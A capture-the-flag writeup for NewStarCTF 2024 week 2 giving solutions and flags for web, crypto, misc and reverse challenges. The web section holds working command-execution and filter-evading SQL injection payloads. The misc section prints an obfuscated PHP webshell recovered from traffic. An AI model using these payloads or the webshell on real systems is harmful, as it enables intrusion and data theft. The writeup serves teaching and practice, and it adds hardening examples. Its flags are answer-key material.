2024-NewStarCTF-WEEK2

Web

你能在一秒内打出八句英文吗 (Can you type eight English sentences in one second?)

The idea is to grab the eight English sentences from the page and have the browser submit them automatically. I had GPT write a script, which yields the flag:

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

driver = webdriver.Chrome()
driver.get('http://eci-2ze34et4ylwxq2gontnc.cloudeci1.ichunqiu.com/start')

# Grab the eight sentences shown in the element with id "text".
sentences = driver.find_element(By.ID, 'text').text.split('. ')

# Re-join them and type the result into the input box.
input_text = '. '.join(sentences)
input_box = driver.find_element(By.ID, 'user-input')
input_box.clear()
input_box.send_keys(input_text)

# Submit well within the one-second limit.
submit_button = driver.find_element(By.ID, 'submit-btn')
submit_button.click()

# Wait for the redirect to the page that shows the flag.
WebDriverWait(driver, 10).until(EC.url_changes(driver.current_url))

Flag: flag{f0a355dc-3b02-46da-befb-c3f839b4ff8c}

遗失的拉链 (The Lost Zipper)

Directory scanning turns up www.zip; downloading it gives the source, which contains pizwww.php:

<?php
error_reporting(0);
//for fun
if(isset($_GET['new'])&&isset($_POST['star'])){
  // Strict (===) comparison of two hash results. On PHP 7 both sha1() and md5()
  // return NULL (with a suppressed warning) when handed an array, so two arrays
  // with different contents satisfy both conditions.
  if(sha1($_GET['new'])===md5($_POST['star'])&&$_GET['new']!==$_POST['star']){
    //huh, why would sha1 and md5 be equal?
    $cmd = $_POST['cmd'];
    // Keyword blacklist on the command string.
    if (preg_match("/cat|flag/i", $cmd)) {
      die("u can not do this ");
    }
    echo eval($cmd);
  }else{
    echo "Wrong";
  }
}

Arrays bypass the strict md5/sha1 comparison, and a shell wildcard bypasses the keyword filter, which gives the flag:

GET: pizwww.php?new[]=1

POST body: star[]=2&cmd=system('more /f*');

Flag: flag{fbb54d68-32a1-4b84-b5e8-016e91724912}

谢谢皮蛋 plus (Thanks, Pidan plus)

After sqlmap got nowhere, I started testing by hand.

Testing shows the injection point closes with a double quote; manual bypass attempts show that spaces and "and" are filtered.

The output is echoed, so a UNION SELECT injection works directly. /**/ stands in for spaces; "and" is barely needed, so the filter on it can be ignored. The following queries enumerate the database, tables and columns and finally read the flag:

-1"/**/UNION/**/SELECT/**/1,database()#

-1"/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema="ctf"#

-1"/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="Fl4g"/**/or/**/table_schema="ctf"#

-1"/**/union/**/select/**/1,group_concat(id,value)/**/from/**/ctf.Fl4g#

Flag: flag{584638f3-4dbc-4fbc-9a36-8737eed0936b}
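The keyword filter in this challenge (spaces and "and") is not a fix, as the /**/ payloads above show. As an added example that is not part of the writeup, the following sqlite3 model puts the vulnerable pattern (blacklist plus string concatenation) beside a parameterized query. The table contents are constructed, and the payload is the writeup's UNION shape adapted to SQLite (`--` instead of MySQL's `#`, a single quote to match the sample query).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database mirroring the challenge layout (a Fl4g table
    with id/value columns). The contents are made up for this example."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'alice'), (2, 'bob')")
    db.execute("CREATE TABLE Fl4g (id INTEGER, value TEXT)")
    db.execute("INSERT INTO Fl4g VALUES (1, 'flag{constructed_sample}')")
    return db


# The challenge's filter: reject spaces and the word "and".
BLOCKED = (" ", "and")


def lookup_filtered(db: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable pattern: blacklist check, then the value is pasted into the SQL
    text. The blacklist says nothing about /**/, UNION or quotes, so the query
    structure is still under the caller's control."""
    if any(token in user_id.lower() for token in BLOCKED):
        raise ValueError("blocked by keyword filter")
    sql = "SELECT id, name FROM users WHERE id='%s'" % user_id
    return db.execute(sql).fetchall()


def lookup_parameterized(db: sqlite3.Connection, user_id: str) -> list:
    """Hardened: the value travels as a bound parameter and is compared as data,
    whatever characters it contains."""
    return db.execute("SELECT id, name FROM users WHERE id=?", (user_id,)).fetchall()


# The writeup's payload shape, adapted to SQLite ('--' comment, single quote).
PAYLOAD = "-1'/**/UNION/**/SELECT/**/1,value/**/FROM/**/Fl4g--"

if __name__ == "__main__":
    db = make_db()
    print("filtered + concatenated:", lookup_filtered(db, PAYLOAD))
    print("parameterized:          ", lookup_parameterized(db, PAYLOAD))
```

The filtered version happily returns the Fl4g row because nothing in the payload matches the blacklist; the parameterized version treats the whole string as an id value that matches no row. The lesson is the one the challenge teaches from the other side: fix the query, not the input.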

复读机 (Repeater)

Testing shows a standard SSTI; the fenjing tool solves it in one go and returns the flag.

Flag: flag{374a4c88-9a79-4ad2-b16d-6554691fbb3d}

Crypto

这是几次方? 疑惑! (What power is this? Confused!)

The main point is telling the XOR operator apart from the power operator and getting operator precedence right.

Plus binds tighter than XOR, so recovering p is simple: XOR hint with e + 10086.

hint = p^e + 10086

After that it is basic RSA; the script:

from Crypto.Util.number import *

c = 36513006092776816463005807690891878445084897511693065366878424579653926750135820835708001956534802873403195178517427725389634058598049226914694122804888321427912070308432512908833529417531492965615348806470164107231108504308584954154513331333004804817854315094324454847081460199485733298227480134551273155762
n = 124455847177872829086850368685666872009698526875425204001499218854100257535484730033567552600005229013042351828575037023159889870271253559515001300645102569745482135768148755333759957370341658601268473878114399708702841974488367343570414404038862892863275173656133199924484523427712604601606674219929087411261
hint = 12578819356802034679792891975754306960297043516674290901441811200649679289740456805726985390445432800908006773857670255951581884098015799603908242531673390
e = 65537

# + binds tighter than ^, so this is hint ^ (10086 + e), which undoes hint = p ^ (e + 10086)
p = hint ^ 10086 + e
q = n // p
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(c, d, n)

print(long_to_bytes(m))

# flag{yihuo_yuan_lai_xian_ji_suan_liang_bian_de2333}

Flag: flag{yihuo_yuan_lai_xian_ji_suan_liang_bian_de2333}

Since you konw something

An XOR challenge where the key is unknown, but we are told it is extremely small, so it can be brute-forced. The script:

from pwn import xor
from Crypto.Util.number import long_to_bytes

c = 218950457292639210021937048771508243745941011391746420225459726647571
flag = long_to_bytes(c)

def brute_force_key(flag):
    # Try every key of 1 to 3 bytes; pwntools' xor() repeats the key over the data.
    for key_length in range(1, 4):
        for i in range(256 ** key_length):
            key = long_to_bytes(i).rjust(key_length, b'\x00')
            plaintext = xor(flag, key)
            # Accept the first candidate that has the flag format.
            if plaintext.startswith(b'flag{') and plaintext.endswith(b'}'):
                print(f"找到密钥: {key}")
                print(f"解密后的明文: {plaintext.decode('utf-8')}")
                return key

brute_force_key(flag)

# 找到密钥: b'ns'
# 解密后的明文: flag{Y0u_kn0w_th3_X0r_b3tt3r}

Flag: flag{Y0u_kn0w_th3_X0r_b3tt3r}
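Brute force works here because the key space is tiny, but a short repeating XOR key can be recovered directly whenever a plaintext prefix is known: ciphertext XOR known prefix is the key stream, and the key is its shortest period. The following is an added example written for this writeup, not the challenge's script; it replaces pwntools' xor() with a plain function and runs on a constructed sample (flag and key made up here), generalising the crib "flag{" to any key no longer than the crib.

```python
from typing import Optional


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (what pwntools' xor() does for two inputs)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def is_plausible(plaintext: bytes) -> bool:
    """Sanity check for a candidate: printable ASCII that closes the flag brace."""
    return plaintext.endswith(b"}") and all(0x20 <= b < 0x7F for b in plaintext)


def recover_key(ciphertext: bytes, crib: bytes, max_len: int = 16) -> Optional[bytes]:
    """Recover a short repeating key from a known plaintext prefix (a "crib").

    ciphertext[:len(crib)] XOR crib is the key stream over that prefix; the key is
    its shortest period. This only works when the crib is at least as long as the
    key, so the search is capped at len(crib), and every candidate is validated on
    the full decryption before it is accepted. Returns None when nothing fits.
    """
    stream = xor_repeat(ciphertext[: len(crib)], crib)
    for k in range(1, min(max_len, len(stream)) + 1):
        candidate = stream[:k]
        if all(stream[i] == candidate[i % k] for i in range(len(stream))):
            if is_plausible(xor_repeat(ciphertext, candidate)):
                return candidate
    return None


# Constructed sample (not the challenge's ciphertext): a flag XORed with a 3-byte key.
SAMPLE_KEY = b"k3y"
SAMPLE_PLAINTEXT = b"flag{constructed_xor_sample}"
SAMPLE_CIPHERTEXT = xor_repeat(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    key = recover_key(SAMPLE_CIPHERTEXT, b"flag{")
    print("recovered key:", key)            # -> b'k3y'
    print("plaintext:", xor_repeat(SAMPLE_CIPHERTEXT, key))
```

With a 2-byte key such as the challenge's, the same routine finds it from the five bytes of "flag{" alone; the brute-force loop is only needed when no plaintext is known.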

Just one and more than two

Since p is prime and, in the first part, p takes the place of n as the modulus, its Euler totient is p - 1.

N is the product of three primes, so its totient is the product of each of the three primes minus one.

from Crypto.Util.number import *

p=11867061353246233251584761575576071264056514705066766922825303434965272105673287382545586304271607224747442087588050625742380204503331976589883604074235133
q=11873178589368883675890917699819207736397010385081364225879431054112944129299850257938753554259645705535337054802699202512825107090843889676443867510412393
r=12897499208983423232868869100223973634537663127759671894357936868650239679942565058234189535395732577137079689110541612150759420022709417457551292448732371
c1=8705739659634329013157482960027934795454950884941966136315983526808527784650002967954059125075894300750418062742140200130188545338806355927273170470295451
c2=1004454248332792626131205259568148422136121342421144637194771487691844257449866491626726822289975189661332527496380578001514976911349965774838476334431923162269315555654716024616432373992288127966016197043606785386738961886826177232627159894038652924267065612922880048963182518107479487219900530746076603182269336917003411508524223257315597473638623530380492690984112891827897831400759409394315311767776323920195436460284244090970865474530727893555217020636612445
e = 65537

# Part 1: the modulus is the prime p itself, so phi(p) = p - 1
phi_p = p - 1
d1 = inverse(e, phi_p)
m1 = pow(c1, d1, p)

# Part 2: three-prime modulus, phi(N) = (p-1)(q-1)(r-1)
N = p * q * r
phi_N = (p - 1) * (q - 1) * (r - 1)
d2 = inverse(e, phi_N)
m2 = pow(c2, d2, N)

print(long_to_bytes(m1) + long_to_bytes(m2))

# flag{Y0u_re4lly_kn0w_Euler_4nd_N3xt_Eu1er_is_Y0u!}

Flag: flag{Y0u_re4lly_kn0w_Euler_4nd_N3xt_Eu1er_is_Y0u!}

Misc

wireshark_checkin

Filter on http, spot flag.txt, follow the TCP stream and the flag is right there.

Flag: flag{ez_traffic_analyze_isn't_it}

wireshark_secret

There is an image in the HTTP traffic; extract it.

Flag: flag{you_are_gooddddd}

字里行间的秘密 (The Secret Between the Lines)

A txt file; decoding the zero-width characters gives the key: it_is_k3y

Open the Word document with that password, select all and change the text colour to reveal the flag.

Flag: flag{you_h4ve_4nyth1n9}

Herta's Study

Filtering on http shows a webshell file horse.php being uploaded first and then used to execute commands.

Extract the webshell and, following its encoding steps, turn it back into a readable webshell. As captured:

<?php
    $payload=$_GET['payload'];
    $payload=shell_exec($payload);
    $bbb=create_function(
        base64_decode('J'.str_rot13('T').'5z'),   
        base64_decode('JG5zPWJhc2U2NF9lbmNvZGUoJG5zKTsNCmZvcigkaT0wOyRpPHN0cmxlbigkbnMpOyRp
        Kz0xKXsNCiAgICBpZigkaSUy'.str_rot13('CG0kXKfAPvNtVPNtVPNtWT5mJlEcKG1m').'dHJfcm90MTMoJG5zWyRpXSk7DQo
        gICAgfQ0KfQ0KcmV0dXJuICRuczs==')   
    );  
    echo $bbb($payload);

?>

The deobfuscated equivalent:

<?php
$payload = $_GET['payload'];
$payload = shell_exec($payload);

// create_function() was deprecated in PHP 7.2 and removed in PHP 8.0; the sample targets an older runtime.
// The generated function base64-encodes the command output and ROT13s every odd-indexed character.
$bbb = create_function(
    '$ns',
    '
    $ns = base64_encode($ns);
    for ($i = 0; $i < strlen($ns); $i += 1) {
        if ($i % 2 == 1) {
            $ns[$i] = str_rot13($ns[$i]);
        }
    }
    return $ns;
    '
);

echo $bbb($payload);
?>

In the traffic, find the command that prints flag.txt and the command output after the webshell has processed it.

Knowing the webshell's encoding steps, we write a script that reverses them and recovers the original string:

<?php
function reverse_encode($encoded_string) {
    // Undo the ROT13 on odd positions (ROT13 is its own inverse)
    for ($i = 0; $i < strlen($encoded_string); $i += 1) {
        if ($i % 2 == 1) {
            $encoded_string[$i] = str_rot13($encoded_string[$i]);
        }
    }

    // Then base64-decode the restored string
    $decoded_string = base64_decode($encoded_string);

    return $decoded_string;
}

$encoded_output = "ZzxuZ3tmSQNsaGRsUmBsNzVOdKQkZaVZLa0tCt==";
$original_input = reverse_encode($encoded_output);

echo $original_input;

# flag{sH3_i4_S0_6eAut1fuL.}

Flag: flag{sH3_i4_S0_6eAut1fuL.}
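For incident response the same decoding is usually needed over every captured response, not just one. The block below is an added Python equivalent of the PHP decoder above, written for this page and not taken from the writeup; it also implements the forward direction so the round trip can be checked, and it is run against the page's own captured string. The second sample string is constructed.

```python
import base64
import codecs

# Encoded response captured in the writeup's traffic (the page's own value).
CAPTURED = "ZzxuZ3tmSQNsaGRsUmBsNzVOdKQkZaVZLa0tCt=="


def rot13_odd_positions(s: str) -> str:
    """Apply ROT13 to the characters at odd indexes. Digits, '+', '/' and '='
    pass through unchanged, matching PHP's str_rot13 on a single character."""
    return "".join(codecs.encode(ch, "rot_13") if i % 2 else ch
                   for i, ch in enumerate(s))


def encode_like_webshell(data: bytes) -> str:
    """Forward direction: what the webshell does to command output before echoing it."""
    return rot13_odd_positions(base64.b64encode(data).decode())


def decode_webshell_response(encoded: str) -> bytes:
    """Inverse: ROT13 is an involution, so reapplying it on odd indexes undoes the
    second step, and base64 decoding undoes the first."""
    return base64.b64decode(rot13_odd_positions(encoded))


if __name__ == "__main__":
    # -> b'flag{sH3_i4_S0_6eAut1fuL.} \n' (the file contents plus a trailing space and newline)
    print(decode_webshell_response(CAPTURED))
    # Round trip on a constructed command output.
    sample = b"uid=33(www-data)"
    assert decode_webshell_response(encode_like_webshell(sample)) == sample
```

Because the transform is deterministic and base64 is canonical, re-encoding the decoded bytes reproduces the captured string exactly, which is a cheap way to confirm the decoder matches the webshell rather than merely producing something readable.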

热心助人的小明同学 (Helpful Classmate Xiaoming)

Solved straight away with a tool.

Flag: flag{ZDFyVDlfdTNlUl9wNHNTdzByRF9IQUNLRVIh}

Reverse

UPX

DIE detects a UPX packer; unpack it.

The main function first RC4-encrypts the flag and then loops, comparing the result against the given bytes.

Double-click into the encryption routine to see the algorithm and the key.

The encrypted value is compared against data; inspect the bytes stored in data, converting the signed integer values in ciphertext to unsigned bytes.

With all the pieces in hand, the script:

def init_sbox(key):
    # RC4 key-scheduling algorithm (KSA): permute 0..255 under the key
    key_length = len(key)
    sbox = list(range(256))
    j = 0
    for i in range(256):
        j = (j + sbox[i] + key[i % key_length]) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]
    return sbox

def rc4_decrypt(ciphertext, key):
    # RC4 PRGA: generate the keystream and XOR it in (decryption == encryption)
    sbox = init_sbox(key)
    i = 0
    j = 0
    plaintext = []
    for byte in ciphertext:
        i = (i + 1) % 256
        j = (j + sbox[i]) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]
        k = sbox[(sbox[i] + sbox[j]) % 256]
        plaintext.append(byte ^ k)
    return bytes(plaintext)

def main():
    key = b"NewStar"
    # the data array the binary compares against, as unsigned bytes
    ciphertext = bytes([
        0xC4, 0x60, 0xAF, 0xB9, 0xE3, 0xFF, 0x2E, 0x9B, 0xF5, 0x10, 0x56, 0x51, 0x6E, 0xEE, 0x5F, 0x7D, 0x7D, 0x6E, 0x2B, 0x9C, 0x75, 0xB5
    ])

    plaintext = rc4_decrypt(ciphertext, key)
    print("解密后的明文:", plaintext.decode('utf-8'))

if __name__ == "__main__":
    main()

# flag{Do_you_know_UPX?}

Flag: flag{Do_you_know_UPX?}
